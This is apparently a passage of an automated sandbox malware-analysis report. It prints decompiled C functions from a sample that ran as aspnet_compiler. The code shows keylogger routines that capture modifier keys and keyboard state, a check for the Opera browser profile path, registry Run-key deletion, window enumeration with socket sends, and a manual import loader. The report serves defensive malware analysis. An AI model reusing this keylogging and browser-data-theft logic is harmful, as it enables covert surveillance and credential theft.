				E00401EE9();
				return _t26;
			}










                0x0040bb03
                0x0040bb03
                0x0040bb03
                0x0040bb0f
                0x0040bb1b
                0x0040bb28
                0x0040bb36
                0x0040bb3c
                0x0040bb3e
                0x0040bb40
                0x0040bb52
                0x0040bb42
                0x0040bb46
                0x0040bb46
                0x0040bb5a
                0x0040bb65

                APIs
                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040BCA9), ref: 0040BB36
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExistsFilePath
                • String ID: AppData$\Opera Software\Opera Stable\
                • API String ID: 1174141254-1629609700
                • Opcode ID: b1708fa5d51ffda48a67eb2c30fb4e479c0b31e554d739664357c27a8378c1db
                • Instruction ID: e6a7174926e5e3b4842ccf786cfde627425bba0d2052536d9f30216573a1e43c
                • Opcode Fuzzy Hash: b1708fa5d51ffda48a67eb2c30fb4e479c0b31e554d739664357c27a8378c1db
                • Instruction Fuzzy Hash: 78F05E30A0021996CA14F7A2DC479FFBB6C9910718B10047FBA01B31D2EE799981C6EE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040ABBC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                Download Yara Rule
                C-Code - Quality: 64%
                			E0040ABBC(void* __ebx, void* __ecx, void* __edx) {
				void* _t4;
				void* _t7;
				void* _t10;
				signed int _t12;
				void* _t13;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;

				_t17 = __edx;
				_t10 = __ebx;
				_t18 = __ecx;
				_t12 = GetKeyState(0x11) & 0x0000ffff;
				_t4 =  *((intOrPtr*)(_t18 + 0x4c)) - 0xa4;
				if(_t4 == 0) {
					_t13 = _t20 - 0x18;
					_push("[AltL]");
					L6:
					E00402073(_t10, _t13, _t17, _t19);
					return E00409B84(_t18);
				}
				_t7 = _t4 - 1;
				if(_t7 == 0) {
					if(_t12 == 0) {
						_t13 = _t20 - 0x18;
						_push("[AltR]");
						goto L6;
					}
					return _t7;
				} else {
					E004099E3(_t18, _t20 - 0x18);
					return E00409BA9(_t18);
				}
			}












                0x0040abbc
                0x0040abbc
                0x0040abbf
                0x0040abc7
                0x0040abcd
                0x0040abd2
                0x0040ac01
                0x0040ac03
                0x0040ac08
                0x0040ac08
                0x00000000
                0x0040ac0f
                0x0040abd4
                0x0040abd7
                0x0040abf0
                0x0040abf5
                0x0040abf7
                0x00000000
                0x0040abf7
                0x0040ac15
                0x0040abd9
                0x0040abdf
                0x0040abec
                0x0040abec

                APIs
                • GetKeyState.USER32(00000011), ref: 0040ABC1
                  • Part of subcall function 004099E3: GetForegroundWindow.USER32(00000000,?,00000000), ref: 00409A17
                  • Part of subcall function 004099E3: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409A22
                  • Part of subcall function 004099E3: GetKeyboardLayout.USER32 ref: 00409A29
                  • Part of subcall function 004099E3: GetKeyState.USER32(00000010), ref: 00409A33
                  • Part of subcall function 004099E3: GetKeyboardState.USER32(?), ref: 00409A40
                  • Part of subcall function 004099E3: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409A5C
                  • Part of subcall function 00409BA9: SetEvent.KERNEL32(?,?,00000000,0040A780,00000000), ref: 00409BD5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                • String ID: [AltL]$[AltR]
                • API String ID: 3195419117-2658077756
                • Opcode ID: df627bc4a743b575a74da755f13919b46736de9882ceb998d69cc3f9b2f42ba8
                • Instruction ID: 96eefd13142f1eb0f51443313c58276a15165e9a298fe6b1d87f9ff32337ecc9
                • Opcode Fuzzy Hash: df627bc4a743b575a74da755f13919b46736de9882ceb998d69cc3f9b2f42ba8
                • Instruction Fuzzy Hash: 9AE0652170431017C918323E691BA7E392197C2774B40016FF9467B6D7D8BE9D5193CF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040AC16 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                Download Yara Rule
                C-Code - Quality: 67%
                			E0040AC16(void* __ebx, void* __ecx) {
				void* _t4;
				void* _t7;
				signed int _t9;
				void* _t10;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t15;

				_t7 = __ebx;
				_t13 = __ecx;
				_t9 = GetKeyState(0x12) & 0x0000ffff;
				_t4 =  *((intOrPtr*)(_t13 + 0x4c)) - 0xa2;
				if(_t4 == 0) {
					if(_t9 == 0) {
						_t10 = _t15 - 0x18;
						_push("[CtrlL]");
						goto L5;
					}
				} else {
					_t4 = _t4 - 1;
					if(_t4 == 0) {
						_t10 = _t15 - 0x18;
						_push("[CtrlR]");
						L5:
						E00402073(_t7, _t10, _t12, _t14);
						return E00409B84(_t13);
					}
				}
				return _t4;
			}











                0x0040ac16
                0x0040ac19
                0x0040ac21
                0x0040ac27
                0x0040ac2c
                0x0040ac42
                0x0040ac47
                0x0040ac49
                0x00000000
                0x0040ac49
                0x0040ac2e
                0x0040ac2e
                0x0040ac31
                0x0040ac36
                0x0040ac38
                0x0040ac4e
                0x0040ac4e
                0x00000000
                0x0040ac55
                0x0040ac31
                0x0040ac5b

                APIs
                • GetKeyState.USER32(00000012), ref: 0040AC1B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: State
                • String ID: [CtrlL]$[CtrlR]
                • API String ID: 1649606143-2446555240
                • Opcode ID: 707982bc91fbbbd2a636e6f7f8ab650285e34d35857256a952e1c03f309ecd73
                • Instruction ID: 5068e35745fff1d0ae311e30ec864f18ca5ee1bac8daf42aff9a91bbfa6ecc8a
                • Opcode Fuzzy Hash: 707982bc91fbbbd2a636e6f7f8ab650285e34d35857256a952e1c03f309ecd73
                • Instruction Fuzzy Hash: E5E08621B0831017D924353F5A1E67A3910A7917A0F41027FF9426B6C6E87E8D2062CF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040DCA3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040DCA3() {
				void* __esi;

				if( *0x474a68 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E00432CF1(0x474a68);
					_t17 =  *0x474a68 - 0xffffffff;
					if( *0x474a68 == 0xffffffff) {
						E0041074B();
						E0043307B(_t17, 0x456962);
						E00432CB2(0x474a68, 0x474a68);
					}
				}
				return 0x474a6c;
			}




                0x00410444
                0x0041044d
                0x00410452
                0x0041045a
                0x0041045c
                0x00410466
                0x0041046c
                0x00410472
                0x00410473
                0x00410479

                APIs
                  • Part of subcall function 0043307B: __onexit.LIBCMT ref: 00433081
                • __Init_thread_footer.LIBCMT ref: 0041046C
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Init_thread_footer__onexit
                • String ID: hJG$lJG
                • API String ID: 1881088180-3986032958
                • Opcode ID: 3098f39f6e044b7fe1c83a17937fea0626eb8e384405a203024fdf0746d1f617
                • Instruction ID: 959a6744f9fea07c9b6c9e8e76648da5020df6129c556cb91e4ae22f1d5d63cc
                • Opcode Fuzzy Hash: 3098f39f6e044b7fe1c83a17937fea0626eb8e384405a203024fdf0746d1f617
                • Instruction Fuzzy Hash: 8DE0D8310415108AC110A71895829E933589B88325B61912FF904976918BAC19C1C75F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00412D0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00412D0B(void* __ecx, short* __edx, short* _a4) {
				void* _v8;
				signed int _t6;

				_push(__ecx);
				if(RegOpenKeyExW(__ecx, __edx, 0, 2,  &_v8) == 0) {
					_t6 = RegDeleteValueW(_v8, _a4);
					asm("sbb al, al");
					return  ~_t6 + 1;
				}
				return 0;
			}





                0x00412d0e
                0x00412d21
                0x00412d2d
                0x00412d35
                0x00000000
                0x00412d37
                0x00000000

                APIs
                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C64D,00000000,00473220,00473238,?,pth_unenc), ref: 00412D19
                • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412D2D
                Strings
                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412D17
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: DeleteOpenValue
                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                • API String ID: 2654517830-1051519024
                • Opcode ID: 73d02ef1f0cc626344373e057ae6400ba39a732c9e2669238d64bd595eb6c070
                • Instruction ID: 31757409137fc2aa28e21d2d38410cee3dd97c0c89aa87a52c5bf8b2ac0ec4d3
                • Opcode Fuzzy Hash: 73d02ef1f0cc626344373e057ae6400ba39a732c9e2669238d64bd595eb6c070
                • Instruction Fuzzy Hash: D6E0C27124820CBBEF104F71EE06FFB376CEB01F01F1002A5B90592191C66ADA149664
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004167F1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                Download Yara Rule
                C-Code - Quality: 73%
                			E004167F1(void* __ebx) {
				void* _t1;
				void* _t5;
				void* _t10;
				void* _t12;

				_t14 =  *0x470d61;
				if( *0x470d61 == 0) {
					 *0x470d61 = 1;
					EnumWindows(E004165EC, 0);
					E004020D6(__ebx, _t12 - 0x18, _t10, _t14, 0x473568);
					_push(0x63);
					E00404A81(0x4734e8, _t10, _t14);
					_t5 = L00405A86(__ebx, 0x473568, _t10, 0x464074);
					 *0x470d61 = 0;
					return _t5;
				}
				return _t1;
			}







                0x004167f1
                0x004167f9
                0x00416802
                0x00416809
                0x0041681a
                0x0041681f
                0x00416826
                0x00416832
                0x00416837
                0x00000000
                0x00416837
                0x0041683f

                APIs
                • EnumWindows.USER32(Function_000165EC,00000000), ref: 00416809
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: EnumWindowssend
                • String ID: h5G$4G
                • API String ID: 2535772952-2693735065
                • Opcode ID: 52884c4969bdfee6880f4c9df27e618c44e04f8f173a2268bf4e2e0b4762a65e
                • Instruction ID: 9fe717f4edf3aaa12838891801d990c24a3a4d72d66b7b51c9a4e32ebb080fb0
                • Opcode Fuzzy Hash: 52884c4969bdfee6880f4c9df27e618c44e04f8f173a2268bf4e2e0b4762a65e
                • Instruction Fuzzy Hash: 3FE080207C9350B6DB31B7697D0679D39064752B54F14007EB5043A3D2C6DD5581C7DE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00411D93 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00411D93() {
				int _t3;
				signed int _t6;

				 *0x470d4b = 0;
				_t3 = TerminateProcess( *0x470d64, 0);
				WaitForSingleObject( *0x470d64, 0xffffffff);
				return _t6 & 0xffffff00 | _t3 != 0x00000000;
			}





                0x00411d9c
                0x00411da3
                0x00411db6
                0x00411dbf

                APIs
                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                • WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ObjectProcessSingleTerminateWait
                • String ID: pth_unenc
                • API String ID: 1872346434-4028850238
                • Opcode ID: ad6d013055d9b0547f0538c52e8fbec790f1cdf5f70ab7e2b39207b65bdb286b
                • Instruction ID: e19746668ad3e5a2aa3259df84083bc395050bd976cc2345e4ea1c63972d9be6
                • Opcode Fuzzy Hash: ad6d013055d9b0547f0538c52e8fbec790f1cdf5f70ab7e2b39207b65bdb286b
                • Instruction Fuzzy Hash: 58D0C93414A311EBD7310BA0BC08B043B68A715362F140271F42C512F1C7659494AA59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00433B7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                Download Yara Rule
                C-Code - Quality: 16%
                			E00433B7E(intOrPtr _a4) {
				char _v16;
				char* _t11;
				char* _t14;
				void* _t17;

				_t11 =  &_v16;
				E00433B3D(_t11, _a4);
				E004379F6( &_v16,  &E0046C448);
				asm("int3");
				_t14 = _t11;
				asm("lock xadd [0x46f024], eax");
				if(1 == 0) {
					_t17 = 0x470060;
					do {
						E0043444B(_t17);
						_t17 = _t17 + 0x18;
					} while (_t17 < 0x470120);
				}
				return _t14;
			}







                0x00433b84
                0x00433b8a
                0x00433b98
                0x00433b9d
                0x00433ba1
                0x00433ba4
                0x00433bac
                0x00433baf
                0x00433bb4
                0x00433bb5
                0x00433bba
                0x00433bbe
                0x00433bc6
                0x00433bca

                APIs
                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433B8A
                  • Part of subcall function 00433B3D: std::exception::exception.LIBCONCRT ref: 00433B4A
                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433B98
                  • Part of subcall function 004379F6: RaiseException.KERNEL32(?,?,00433B7D,?,?,?,00000000,?,?,?,P@,00433B7D,?,0046C40C,00000000), ref: 00437A55
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                • String ID: P@
                • API String ID: 1586462112-676759640
                • Opcode ID: be34dfb19e6d27ab7c593c9c32c23ad28ddfa9a66cdc613b31972520aea6299d
                • Instruction ID: fee150121e0675781914aead59bbd43a186a04d22f31c7314f5b286c5f6f48c1
                • Opcode Fuzzy Hash: be34dfb19e6d27ab7c593c9c32c23ad28ddfa9a66cdc613b31972520aea6299d
                • Instruction Fuzzy Hash: D0C08CB4C0030CB7CB00FBE5C856E9DB73C9F08304F50852ABA5092082EB78A30987DA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043F561 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E0043F561(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E004390B7(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E0043EEAD())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t56 = _t70 + 1;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E0043EEAD())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E00449490(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E0043EEAD())) = 0x16;
					return E0043A5BB() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}




























                0x0043f561
                0x0043f56a
                0x0043f56f
                0x0043f572
                0x0043f576
                0x0043f585
                0x0043f588
                0x0043f5a8
                0x0043f5ad
                0x0043f5b0
                0x0043f5b2
                0x0043f680
                0x0043f686
                0x0043f69b
                0x0043f6a7
                0x0043f6ad
                0x0043f6af
                0x0043f6be
                0x0043f6be
                0x0043f6be
                0x0043f6c1
                0x0043f6c1
                0x0043f6c5
                0x0043f6c7
                0x0043f6ca
                0x0043f6ca
                0x0043f6ca
                0x0043f6ca
                0x00000000
                0x0043f6d1
                0x0043f6b6
                0x00000000
                0x0043f6b6
                0x0043f688
                0x0043f68b
                0x0043f68e
                0x0043f68e
                0x0043f690
                0x0043f691
                0x0043f691
                0x0043f695
                0x00000000
                0x0043f695
                0x0043f5b8
                0x0043f5be
                0x0043f5eb
                0x0043f5f7
                0x0043f5fd
                0x0043f5ff
                0x00000000
                0x00000000
                0x0043f605
                0x0043f60b
                0x0043f60e
                0x0043f66a
                0x0043f66f
                0x0043f677
                0x00000000
                0x0043f677
                0x0043f610
                0x0043f613
                0x0043f615
                0x0043f618
                0x0043f61a
                0x0043f61c
                0x0043f652
                0x0043f660
                0x0043f666
                0x0043f668
                0x0043f67c
                0x00000000
                0x0043f67c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0043f61e
                0x0043f61e
                0x0043f61e
                0x0043f621
                0x0043f624
                0x0043f626
                0x00000000
                0x00000000
                0x0043f630
                0x0043f637
                0x0043f63a
                0x0043f63c
                0x0043f644
                0x0043f644
                0x0043f647
                0x0043f648
                0x0043f64b
                0x0043f64d
                0x00000000
                0x00000000
                0x00000000
                0x0043f64d
                0x0043f63e
                0x0043f63f
                0x0043f642
                0x00000000
                0x00000000
                0x00000000
                0x0043f642
                0x0043f64f
                0x00000000
                0x0043f64f
                0x0043f5c0
                0x0043f5c2
                0x00000000
                0x00000000
                0x0043f5c8
                0x0043f5cb
                0x0043f5cf
                0x0043f5d2
                0x0043f5d6
                0x00000000
                0x00000000
                0x0043f5dc
                0x0043f5dd
                0x0043f5e0
                0x0043f5e2
                0x00000000
                0x00000000
                0x00000000
                0x0043f5e4
                0x00000000
                0x0043f5cb
                0x0043f58f
                0x00000000
                0x0043f59a
                0x0043f57c
                0x0043f582
                0x00000000
                0x0043f582
                0x0043f6d9

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043F5F7
                • GetLastError.KERNEL32 ref: 0043F605
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043F660
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$ErrorLast
                • String ID:
                • API String ID: 1717984340-0
                • Opcode ID: 4fb4c8b8568d1047ed6eec146a53b7fea1d3df898e1d451945ab7130e1f9dab9
                • Instruction ID: 66686387026925be6180075210ad86107624aebec9d48f20dae67bb7d6d05db2
                • Opcode Fuzzy Hash: 4fb4c8b8568d1047ed6eec146a53b7fea1d3df898e1d451945ab7130e1f9dab9
                • Instruction Fuzzy Hash: 7541F831E04206AFDB218F65C846ABB7BA4DF09320F14517FF895972B1DB388D06CB59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004110A2 Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E004110A2(intOrPtr* __ecx) {
				intOrPtr _t38;
				intOrPtr _t41;
				void _t49;
				int _t52;
				signed short _t54;
				signed int _t55;
				intOrPtr _t56;
				intOrPtr _t58;
				intOrPtr _t59;
				signed short* _t60;
				intOrPtr _t66;
				intOrPtr _t69;
				intOrPtr _t73;
				void _t74;
				void* _t77;
				intOrPtr* _t78;
				void* _t81;
				void* _t83;
				void* _t84;

				_t78 = __ecx;
				_t77 = 1;
				_t38 =  *__ecx;
				_t58 =  *((intOrPtr*)(__ecx + 4));
				 *((intOrPtr*)(_t84 + 0x10)) = _t58;
				if( *((intOrPtr*)(_t38 + 0x84)) != 0) {
					_t81 =  *((intOrPtr*)(_t38 + 0x80)) + _t58;
					if(IsBadReadPtr(_t81, 0x14) == 0) {
						_t83 = _t81 + 0x10;
						while(1) {
							_t41 =  *((intOrPtr*)(_t83 - 4));
							if(_t41 == 0) {
								goto L24;
							}
							_t59 =  *((intOrPtr*)(_t78 + 0x24))(_t41 + _t58,  *((intOrPtr*)(_t78 + 0x34)));
							 *((intOrPtr*)(_t84 + 0x20)) = _t59;
							if(_t59 == 0) {
								SetLastError(0x7e);
								goto L23;
							} else {
								_push(4 +  *(_t78 + 0xc) * 4);
								_push( *((intOrPtr*)(_t78 + 8)));
								_t66 = E0043F7DD();
								if(_t66 == 0) {
									 *((intOrPtr*)(_t78 + 0x2c))(_t59,  *((intOrPtr*)(_t78 + 0x34)));
									SetLastError(0xe);
									L23:
									_t77 = 0;
								} else {
									 *((intOrPtr*)(_t78 + 8)) = _t66;
									 *((intOrPtr*)(_t66 +  *(_t78 + 0xc) * 4)) = _t59;
									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
									_t49 =  *(_t83 - 0x10);
									if(_t49 == 0) {
										_t49 =  *_t83;
									}
									_t69 =  *((intOrPtr*)(_t84 + 0x14));
									_t74 =  *_t83;
									_t60 = _t49 + _t69;
									if( *_t60 != 0) {
										 *((intOrPtr*)(_t84 + 0x10)) = _t74 - _t60 + _t69;
										while(1) {
											_t54 =  *_t60;
											_push( *((intOrPtr*)(_t78 + 0x34)));
											if(_t54 >= 0) {
												_t55 = _t54 + _t69 + 2;
											} else {
												_t55 = _t54 & 0x0000ffff;
											}
											_t56 =  *((intOrPtr*)(_t78 + 0x28))( *((intOrPtr*)(_t84 + 0x20)), _t55);
											_t73 =  *((intOrPtr*)(_t84 + 0x1c));
											_t84 = _t84 + 0xc;
											 *((intOrPtr*)(_t73 + _t60)) = _t56;
											if( *((intOrPtr*)(_t73 + _t60)) == 0) {
												break;
											}
											_t69 =  *((intOrPtr*)(_t84 + 0x14));
											_t60 =  &(_t60[2]);
											if( *_t60 != 0) {
												continue;
											} else {
											}
											goto L17;
										}
										_t77 = 0;
									}
									L17:
									if(_t77 == 0) {
										 *((intOrPtr*)(_t78 + 0x2c))( *((intOrPtr*)(_t84 + 0x1c)),  *((intOrPtr*)(_t78 + 0x34)));
										SetLastError(0x7f);
									} else {
										_t83 = _t83 + 0x14;
										_t52 = IsBadReadPtr(_t83 - 0x10, 0x14);
										_t58 =  *((intOrPtr*)(_t84 + 0x14));
										if(_t52 == 0) {
											continue;
										} else {
										}
									}
								}
							}
							goto L24;
						}
					}
					L24:
				}
				return _t77;
			}






















                0x004110a7
                0x004110ac
                0x004110ad
                0x004110af
                0x004110b2
                0x004110bd
                0x004110cc
                0x004110d7
                0x004110dd
                0x004110e0
                0x004110e0
                0x004110e5
                0x00000000
                0x00000000
                0x004110f4
                0x004110f6
                0x004110fe
                0x004111d4
                0x00000000
                0x00411104
                0x0041110e
                0x0041110f
                0x00411119
                0x0041111d
                0x004111c9
                0x004111d4
                0x004111d4
                0x004111da
                0x00411123
                0x00411126
                0x00411129
                0x0041112c
                0x0041112f
                0x00411134
                0x00411136
                0x00411136
                0x00411139
                0x0041113d
                0x00411140
                0x00411146
                0x0041114d
                0x00411151
                0x00411151
                0x00411153
                0x00411158
                0x00411162
                0x0041115a
                0x0041115a
                0x0041115a
                0x00411169
                0x0041116c
                0x00411170
                0x00411173
                0x0041117c
                0x00000000
                0x00000000
                0x0041117e
                0x00411182
                0x00411188
                0x00000000
                0x00000000
                0x0041118a
                0x00000000
                0x00411188
                0x0041118c
                0x0041118c
                0x0041118e
                0x00411190
                0x004111b6
                0x004111bd
                0x00411192
                0x00411192
                0x0041119b
                0x004111a1
                0x004111a7
                0x00000000
                0x00000000
                0x004111ad
                0x004111a7
                0x00411190
                0x0041111d
                0x00000000
                0x004110fe
                0x004110e0
                0x004111dc
                0x004111dc
                0x004111e5

                APIs
                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411433), ref: 004110CF
                • IsBadReadPtr.KERNEL32(?,00000014,00411433), ref: 0041119B
                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004111BD
                • SetLastError.KERNEL32(0000007E,00411433), ref: 004111D4
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLastRead
                • String ID:
                • API String ID: 4100373531-0
                • Opcode ID: 9794c43bf96480927521ed5b23b738f4c51868486ab28171da95fa3270170194
                • Instruction ID: 8f6c103362ea378475082746bf01fa46c2f289026e2d243d47b01123f6745c32
                • Opcode Fuzzy Hash: 9794c43bf96480927521ed5b23b738f4c51868486ab28171da95fa3270170194
                • Instruction Fuzzy Hash: 36418E71604305AFEB248F19DC84BA7B7E5FF48714F00482EEB46876A1EB34E845CB19
                Uniqueness

                Uniqueness Score: -1.00%